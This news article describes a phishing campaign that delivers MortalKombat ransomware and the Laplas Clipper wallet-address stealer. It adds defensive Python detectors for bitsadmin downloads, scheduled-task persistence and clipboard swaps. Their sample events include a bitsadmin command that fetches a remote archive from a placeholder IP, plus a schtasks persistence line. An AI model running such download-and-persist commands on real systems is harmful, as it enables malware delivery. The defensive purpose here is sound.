
Hackers Deploy MortalKombat Ransomware and Laplas Clipper Malware

Unknown threat actors are targeting cryptocurrency users with two new threats in a financially motivated campaign active since December 2022. The campaign deploys a variant of the Xorist commodity ransomware named MortalKombat and a Go variant of the Laplas Clipper malware.

About the campaign

Cisco Talos found that the campaign mainly targets victims in the U.S., followed by the U.K., Turkey, and the Philippines.
  • The multi-stage attack chain starts with a phishing email carrying a malicious ZIP attachment that contains a BAT loader script. When the victim runs it, the script uses the LOLBin bitsadmin to download a second ZIP archive from a remote resource.
  • The BAT loader script uses an embedded VB script to inflate the downloaded archive automatically and drops the final payload, which is either Laplas Clipper or MortalKombat.
  • The loader then runs the payload and finally deletes the dropped malicious files to cover the attackers' tracks and make detection and analysis harder.
  • The threat actors also scan the internet for victim machines with an exposed RDP port (3389), using one of their download servers that runs an RDP crawler.
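The loader behaviour described above (bitsadmin pulling a remote archive from a script host, and a scheduled task being created for persistence) is the kind of thing a defender can look for in process-creation telemetry. The following is an added example, not code from Cyware or Talos: it runs two simple heuristics over constructed Sysmon-style process-creation events. The field names, the sample command lines, the IP address and the file paths are all assumptions made for the demonstration.

```python
"""Flag process-creation events that resemble the BAT-loader behaviour.

Added example (not from the original article). The events below are
constructed to look like Sysmon Event ID 1 records; the heuristics are
this example's own assumptions, not published detection rules.
"""
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class ProcEvent:
    image: str          # full path of the created process
    command_line: str   # its command line
    parent_image: str   # full path of the parent process


# bitsadmin being told to /transfer something from an http(s) URL
BITSADMIN_DOWNLOAD = re.compile(
    r"bitsadmin(?:\.exe)?\b.*\s/transfer\b.*\bhttps?://", re.IGNORECASE)
# schtasks creating a task (Laplas Clipper persistence on this page)
SCHTASKS_CREATE = re.compile(r"schtasks(?:\.exe)?\b.*\s/create\b", re.IGNORECASE)
# parents that indicate a script (BAT / VBS) launched the tool
SCRIPT_HOST = re.compile(r"\\(?:cmd|wscript|cscript)\.exe$", re.IGNORECASE)


def classify(ev: ProcEvent) -> List[str]:
    """Return finding labels for one event; an empty list means nothing matched."""
    findings: List[str] = []
    if BITSADMIN_DOWNLOAD.search(ev.command_line):
        findings.append("bitsadmin_remote_download")
    if SCHTASKS_CREATE.search(ev.command_line):
        findings.append("schtasks_task_created")
    # Only add the parent context when something else already fired, so a
    # plain cmd.exe child does not become a finding on its own.
    if findings and SCRIPT_HOST.search(ev.parent_image):
        findings.append("parent_is_script_host")
    return findings


def scan(events: List[ProcEvent]) -> Dict[int, List[str]]:
    """Map event index -> findings for every event that produced at least one."""
    result: Dict[int, List[str]] = {}
    for i, ev in enumerate(events):
        findings = classify(ev)
        if findings:
            result[i] = findings
    return result


# Constructed sample events (not real telemetry). 203.0.113.5 is a
# documentation address and the paths are placeholders.
SAMPLE_EVENTS = [
    ProcEvent(
        image=r"C:\Windows\System32\bitsadmin.exe",
        command_line=r"bitsadmin /transfer job1 /download /priority normal "
                     r"http://203.0.113.5/second.zip C:\Users\Public\second.zip",
        parent_image=r"C:\Windows\System32\cmd.exe"),
    ProcEvent(
        image=r"C:\Windows\System32\schtasks.exe",
        command_line=r'schtasks /create /sc minute /mo 1 /tn "Updater" '
                     r'/tr "C:\Users\Public\clipper.exe"',
        parent_image=r"C:\Users\Public\clipper.exe"),
    ProcEvent(   # benign: listing BITS jobs does not fetch anything
        image=r"C:\Windows\System32\bitsadmin.exe",
        command_line=r"bitsadmin /list /allusers",
        parent_image=r"C:\Windows\System32\cmd.exe"),
    ProcEvent(   # benign: unrelated process
        image=r"C:\Windows\System32\notepad.exe",
        command_line=r"notepad.exe notes.txt",
        parent_image=r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for idx, labels in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx].command_line, "->", labels)
```

Only the first two constructed events produce findings; the `bitsadmin /list` event is deliberately included to show that the rule keys on the `/transfer` verb plus a remote URL rather than on the binary name alone, which keeps ordinary administrative use of BITS out of the alert queue.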

Notably, both the malware and the ransomware establish persistence on the victim's machine.

MortalKombat infection summary

The MortalKombat-themed campaign extorts victims for payment in exchange for a decryptor to unlock their data.
  • The phishing mail pretends to be from CoinPayments and contains a malicious ZIP file whose filename resembles a transaction ID mentioned in the email body.
  • The attackers lure victims into unzipping the attachment and viewing its contents, which is the malicious BAT loader. The loader drops and executes MortalKombat.
  • The ransomware is capable of encrypting various files on the victim machine’s filesystem, such as application, backup, database, system, and virtual machine files, as well as files on the remote locations mapped as logical drives in the victim’s machine.
  • It doesn’t show wiper behavior but renders the victim’s system inoperable by corrupting Windows Explorer, removing applications and folders from Windows startup, and disabling the Run command window on the system.
  • Finally, it drops the ransom note, changes the victim machine's wallpaper once encryption completes, and uses qTOX or ProtonMail to communicate with the victim.

Laplas Clipper attack chain

Laplas Clipper is used to steal a number of cryptocurrency wallet addresses, including Dash, Bitcoin, Bitcoin Cash, Zcash, Litecoin, Ethereum, Binance Coin, Dogecoin, Monero, Ripple, Tezos, Ronin, Tron, Cardano, and Cosmos, by hijacking crypto transactions. Here's how the attack unfolds:
  • First, the Clipper decrypts its embedded strings and creates a Windows scheduled task by executing the schtasks command.
  • The scheduled task monitors the victim's clipboard for a cryptocurrency wallet address and sends any address it finds to the attacker-controlled Clipper bot.
  • The bot generates a lookalike wallet address and writes it to the victim machine's clipboard, which subsequently results in a fraudulent cryptocurrency transaction.
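The clipboard swap described above has a detectable shape: a wallet-looking string in the clipboard is replaced, within moments, by a different string of the same address format that shares its first and last characters. The following is an added example, not code from the article or from Talos: it classifies clipboard contents by address format and reports such replacements. The observation log is constructed, the wallet addresses are made-up strings that merely satisfy the format checks, and the five-second window and the address regexes are this example's own assumptions.

```python
"""Detect clipboard-hijack style address swaps in a clipboard observation log.

Added example (not from the original article). Each observation is
(timestamp_seconds, clipboard_text). The address patterns cover a few of
the currencies named on the page and are simplified format checks, not
full checksum validation.
"""
import re
from typing import Dict, List, Optional, Tuple

ADDRESS_PATTERNS = {
    # legacy P2PKH/P2SH (base58) or bech32 Bitcoin addresses
    "bitcoin": re.compile(
        r"^(?:[13][a-km-zA-HJ-NP-Z1-9]{25,34}|bc1[02-9ac-hj-np-z]{25,59})$"),
    "ethereum": re.compile(r"^0x[0-9a-fA-F]{40}$"),
    "litecoin": re.compile(
        r"^(?:[LM][a-km-zA-HJ-NP-Z1-9]{26,33}|ltc1[02-9ac-hj-np-z]{25,59})$"),
    "monero": re.compile(r"^[48][0-9A-Za-z]{94}$"),
}

Observation = Tuple[float, str]
Alert = Dict[str, object]


def address_kind(text: str) -> Optional[str]:
    """Return the currency whose address format the text matches, or None."""
    candidate = text.strip()
    for kind, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(candidate):
            return kind
    return None


def shared_affix(a: str, b: str) -> Tuple[int, int]:
    """Length of the common prefix and common suffix of two strings."""
    n = min(len(a), len(b))
    prefix = next((i for i in range(n) if a[i] != b[i]), n)
    suffix = next((i for i in range(n) if a[-1 - i] != b[-1 - i]), n)
    return prefix, suffix


def detect_swaps(observations: List[Observation],
                 window_seconds: float = 5.0) -> List[Alert]:
    """Report an address replaced by a different same-format address within the window."""
    alerts: List[Alert] = []
    previous: Optional[Tuple[float, str, str]] = None  # (ts, text, kind)
    for ts, text in observations:
        kind = address_kind(text)
        if previous is not None and kind is not None:
            prev_ts, prev_text, prev_kind = previous
            if kind == prev_kind and text != prev_text and ts - prev_ts <= window_seconds:
                prefix, suffix = shared_affix(prev_text, text)
                alerts.append({
                    "kind": kind,
                    "original": prev_text,
                    "replacement": text,
                    "seconds_between": ts - prev_ts,
                    "shared_prefix": prefix,   # lookalikes keep the visible ends
                    "shared_suffix": suffix,
                })
        # Only addresses are worth remembering; anything else resets the state.
        previous = (ts, text, kind) if kind is not None else None
    return alerts


# Constructed addresses: valid in format only, chosen so the "fake" keeps
# the same first and last characters as the "real" one.
BTC_REAL = "1DefenderTestAddrQ8Vk3m2JpH5rN9tEwX"
BTC_FAKE = "1DefrZ9kTbW4hP7sQmL2nJ3vXcA6tEwX"
ETH_REAL = "0xab12" + "c" * 32 + "ef90"
ETH_FAKE = "0xab12" + "d" * 32 + "ef90"

SAMPLE_OBSERVATIONS: List[Observation] = [
    (0.0, "meeting notes for Monday"),
    (1.0, BTC_REAL),
    (1.3, BTC_FAKE),        # swapped 0.3 s later -> alert
    (10.0, ETH_REAL),
    (10.2, ETH_FAKE),       # swapped 0.2 s later -> alert
    (20.0, ETH_REAL),       # 9.8 s after the previous address -> outside window
    (30.0, "hello"),
    (31.0, BTC_REAL),       # no prior address in state -> nothing to compare
]

if __name__ == "__main__":
    for alert in detect_swaps(SAMPLE_OBSERVATIONS):
        print(alert)
```

A user copying two different legitimate addresses in quick succession would also trip this check, so on a real endpoint the detector would pair the clipboard change with the absence of a user copy action (no keyboard or menu event) before raising an alert; the affix counts are reported so an analyst can see at a glance that the replacement was built to survive a quick visual comparison of the address ends.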

Summing up

A single campaign delivering both malware and ransomware highlights the eagerness of threat actors to target the emerging cryptocurrency landscape. MortalKombat is not very sophisticated at the moment, whereas the Laplas Clipper operators are continuously releasing updates. Potential targets should therefore watch carefully for convincing phishing emails and keep offline backups for the worst-case scenario.
Cyware Publisher